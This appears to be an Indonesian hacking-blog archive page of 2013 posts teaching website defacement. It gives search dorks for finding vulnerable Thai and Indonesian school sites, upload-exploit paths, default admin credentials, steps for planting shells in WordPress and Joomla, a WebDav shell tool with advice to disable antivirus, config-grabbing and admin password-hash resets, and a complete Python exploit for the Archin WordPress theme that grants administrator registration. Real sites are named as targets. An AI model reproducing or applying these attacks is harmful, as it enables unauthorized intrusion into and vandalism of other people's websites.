Tampilkan postingan dengan label DEFACE. Tampilkan semua postingan
Tampilkan postingan dengan label DEFACE. Tampilkan semua postingan

Kamis, 03 Oktober 2013

Deface Website Dengan Teknik Spaw Upload Vulnerability






 Hello Sobat GCA :) Saya Akan Mengajari Tutorial Deface Dengan cara teknik tersebut ..
 maaf no SS :) Tanpa Basa Basi ..

Langkah :
1.Buka Om Google Masukin 
Dork :
inurl:”spaw2/uploads/files/” site:th
site:th bisa di ganti dengan negara yg agan mau deface :)
2.Ane Masukin Contoh Target ~> www.target.th/w3c/senate/spaw2/uploads/files/
3. Ganti  spaw2/uploads/files dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
4. upload file agan" ..
5. Nanti Kalo Sukses Di sebelah kanan ada bacaan download file , terus kalian harus click itu supaya tau link hasil defacean kalian ..

Sekian Dari Saya ..

Selasa, 01 Oktober 2013

Cara Tebas Index WordPress





Woi Kali Ini Saya Share Tutorial Cara Deface Index Website Wordpress :v :p Langsung Saja Ya Om Saya Males Nulis Capek 

1).Login Dulu Om Klo Gk Login Gimana Mau Nebasnya Wkwkwk :D


2).Ke Appearance => Editor

 

















3).Masukin Shellnya Truss Klik Edit

4).Lalu Kalo Sudah Buka Dengan Cara http://site.com/wp-content/themes/twentytwelve/namafile.php

5).Eksekusi Dehh Cari Index.php nya Di Public html

Selamat Menebas

Cara Deface Mudah Dengan (WebDav)



Cara Deface Website Dengan Webdav Shell Maker | Hmei7


Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi heker, cracker, ceker atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah 

Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.

WebDav Shell Maker : Download Disini
Password : garudacyberattacker

1). Download kemudian extract file
2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.




3).Selanjutnya, pilih Add site, disini saya menggunakan target http://www.beijinggym.com/ lalu klik OK.



4)Jika Sudah Klik Serang :v



5).Jika Succes Akan Keluar Seperti Dan Buka Link Tersebut





6).Lalu Cari File Index.php/Index.html Tekan CTRL+F Biar Lebih Gampang




7).Lalu Masukin Dehh Script DefaceNya Dan Klik Kaydet



8). Buka Defacan Ente Dengan Cara :
http://Target Kamu.com/index.php

NB: Matikan AntiVirus Sebelum Mengguakan WebDav Karena Anti Virus Anggap WebDav Sebagai Virus 



Cara Deface Website sch.id




Tutorial Deface Website .sch.id




Deface adalah hal yang sudah biasa dilakukan mungkin, dan mungkin tutorial deface yang satu ini tidak layak tapi tidak ada salahnya untuk Berbagi Ilmu .. Dan kita bisa mendeface index websitenya secara langsung ..

Tutorial Deface Index Website .sch.id : 

1. Pergi ke google.co.id, Tuliskan dorknya :

inurl:sch.id" intext:"tim balitbang" intext:"sdn"

Tutorial Deface Index Website .sch.id

2. Pilih salah satu website
3. Setelah mendapatkan websitenya, gunakan exploit :  /member/index.php 

Tutorial Deface Index Website .sch.id

4. Silahkan coba login dengan user dan password defaultnya :

User :    | Password :

Admin : 123456
Kickdody : 123456
Siswanto : 123456
Alumni : 123456
Alan : 123456
Tomi : 123456

5.  Nah kalau tidak bisa login, silahkan cari website lain.. intinya jangan menyerah mereka yang berhasil adalah mereka yang terus mencoba Dan Di Dunia Hacking Tdk Ada Yg Instan..

6. Nah jika sudah berhasil silahkan dieksekusi deh tuh website.. Jika ingin menanamkan shell  tinggal ke sim > data laporan > tambah laporan dan web tersebut sukses terdefaced

NB: Tdk Semua Web Bisa Di Deface Bro Jadi Harap Sabar Dan Teliti


Deface Website Dengan Teknik Upload File Di SHOP737





Saya Akan Mengajari Tutorial Deface Dengan cara teknik tersebut ..
Tanpa Basa Basi ..
Langkah :
1.Buka Om Google Masukin Dork : intext:"Powered by Shop737"
2.Buka Salah Satu Website Yang Anda Dapat Dari Hasil Dorking >.<
3.setelah anda buka , anda masukan exploit : url/poto/upload.php | example : livetarget.com/poto/upload.php
4.Kalau Diminta ID Dan Password , isikan :
username : admin
password: admin
5.Kalau Anda Tidak Berhasil Login Menggunakan Username dan Password diatas >.< , silahkan cari web yang lain >.< , kalau berhasil anda tinggal upload file yang format txt atau image >.< dengan cara di foto berikut :


___________________________________________________________________________________ 
penjelasan :
Nomor :
1.Untuk membuat kategori , masukan saja disitu nama kategori yang anda ingin buat
2.Untuk Membuat Kategori , nama kategorinya di nomor 1
3.Pilih Kategori , jadi kita upload file ke kategori tersebut >.<
4.Masukan File Sobat , dengan format txt atau image
5.Kirim File Sobat Ke Website Tersebut >.<
___________________________________________________________________________________

6.Jika Sobat Berhasil Upload file sobat , sobat dapat membuka nya dengan format : url/foto/(kategori yang sobat pilih)/namafilesobat | example : livetarget.com/foto/indonesiahere/riel404.txt

Sekian Dari Saya >.<

Rabu, 25 September 2013

Deface Web Yang Kita Inginkan Dengan Reverse IP


1).Pertama Join Group Dulu Ya Klik Disini
2).Kalo Sudah Kebuka Masukan Domain Yang Anda Ingkinkan Example seo-cyber.com




 3). Klik Check Ntar Kelihatan IP nya Kalo kgk Keliatan Berarti Anda Mahoo Kwkwk



4).Buka Bing.com Lalu Masukan Dork Berikut
IP:IP KAMU .php?

Contoh :
IP:64.31.11.114 .php?
 Dork Bisa Di Kembangin Biar Lebihh Joss
5).Lalu Tinggal Eksekusi Dehh Ane Saranin Untuk Pakek SQL Injection,Havij

Senin, 23 September 2013

Cara Deface Dengan Teknik Config







Bahan yang dibutuhkan :
1).Shell => Downlad Disini Password: garudacyberattacker
2).cPanel
3).Encrypter Klik Disini

Langsung saja simak

1).Buka cPanel Lalu Upload Shell Yang Tadi Jika Sudah Buka Dengan Cara
    http://site.com/namafile.php

2).Klik Eval Truss Klik Go ! Broo



3).Jika Sudah Akan Keluar Seperti Ini Lalu Copy Dan Ke Config



4).Lalu Pastekan Copyan Tadi Ke Kotak Lalu Klik Hajar Lihat Gambar Di Bawah Ini



5).Jika Sudah ada Tulisan Done Silahkan Buka Url Kmu Dengan Cara
   http://Site.com/config



6).Klik Dan Akan Keluar Seperti Gambar



7).Buka Shell Lagi Trus Ky MySql Lalu Masukin Database Username Sama Password Tadi
   Jika Anda Berhasil Login Akan Keluar Seperti Ini Lalu Klik Tables Yg Di bawah Sendiri


8).Jika Sudah Cari Yg Blakangnya User Lalu Klik Data



9).Klik Edit


10).Lalu Ke Encrypter Tadi Trus Masukin Password Anda Misal 123456



11).Copykan Md5 Hashnya Ke Edit Tadi Trus Klik Edit



12).Lalu Login Dehh Ke Site Adminya
     Wordpress: wp-Admin
      Joomla : administrator

13).Enjoy Om

Demonya Om : http://www.nomorebackpain-info.com/

NB: JIKA ADA YG DITANYAKAN KOMENTAR DI BAWAH





Cara Tebas Index Joomla






Kali Ini Saya Akan Kasih Tutorial Cara Tebas Index Joomla,Inget Joomla Kalo Wordpress Kemaren Kan UDah Si Om Oke Tanpa Banyak Basa-Basi Langsung Saja Ke TKP

Bahan :
=> Not Found (wkwkwk Bercanda)

Langsung Saja

1).Login Ke Joomla Klo Gk Login Mana Bisa Tebas :v



2).Ke Template Manager => Templates => Terserah Pilih Template Yg Mana



3).Klik Edit main page template Lalu Masukan Shellnya om


4).Buka Shellnya Lalu Cari Yg Sekiranya Itu Halaman Utama Atau Indexnya



5).Hahahah Succes Kita Joget Caisar DUlu Suling Sakti Wkwkwkwk



NB: JIKA ANDA BINGUNG JANGAN SUNGKAN UNTUK BERKOMENTAR!!

Cara Deface Dengan Archin WordPress









YeyeyeLalaalaala Wkwkwk Hey Ketemu Saya Lagi Broo Nihh Ane Mau Nunjukin Deface Dengan Teknik Archin Oke Langsung Saja Om Ke TKP

BAHAN:
-Kopi
-Camilan 
-python (Gk Punya Python Download Di Google Om )

Gw Anggap Lo Sudh Punya Python Langsung Saja Install python

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "Targetnya Broo"
#path to ajax.php
url = "/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
   
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"

save filenya dengan berekstensi .py Inget .py Jgn Yg Laen Wkwkwk
lalu cari target website dengan mengunakan dork berikut :

DORK:
/wp-content/themes/*/hades_framework/ 
 /wp-content/themes/felici/hades_framework/ 
 /wp-content/themes/averin/hades_framework/ 
 /wp-content/themes/shotzz/hades_framework/
 /wp-content/themes/KLR/hades_framework/
 /wp-content/themes/yvora/hades_framework/
 /wp-content/themes/ratius/hades_framework/
 /wp-content/themes/dagda/hades_framework/ 
 /wp-content/themes/shopsum/hades_framework/
 /wp-content/themes/ultrici/hades_framework/
 /wp-content/themes/bizniz/hades_framework/
 /wp-content/themes/appius/hades_framework/ 
 /wp-content/themes/majestics/hades_framework/
 /wp-content/themes/candy/hades_framework/
 /wp-content/themes/vithy/hades_framework/ 
 /wp-content/themes/sodales/hades_framework/

Cari Targetnya Broo Dengan Dork Di Atas



Lalu Coba Buka Misalnya Saya Tadi Pakek Dork /wp-content/themes/yvora/hades_framework/
Berarti Ntar Cek Sitenya Vuln Atau Tdk Dengan Cara http://site/wp-content/themes/yvora/hades_framework/option_panel/ajax.php/
Jika Target Tersebut Blnk/Kosong Berarti Web Berikut Vuln

Setelah Itu Buka Start ~> run ~> cmd
ketik "D:" (karena script yg diatas saya letakkan di local disk D)
ketik lagi "filenya.py" dan pencet enter. sehingga menjadi seperti ini :



Jika Sudah Seperti Itu Tandanya Berhasil Tinggal Register Dehh
http:/site.com/wp-login.php



Jika Sudah Registrasi Password Akan Terkirim Ke Email Tadi Cek Email Kamu Broo



Kalo Sudah Terserah Dehh Lo Apain Webnya Tapi Jgn Tebas Index.phpnya Index.phpnya Rename Aja Ganti Dengn Index.html Hargai Karya Orang

NB : Kami Tidak Bertanggung Jawab Atas Segala Hall Yang Anda Lalukan!!

Content By : Imron X-GEN

Postingan Lama Beranda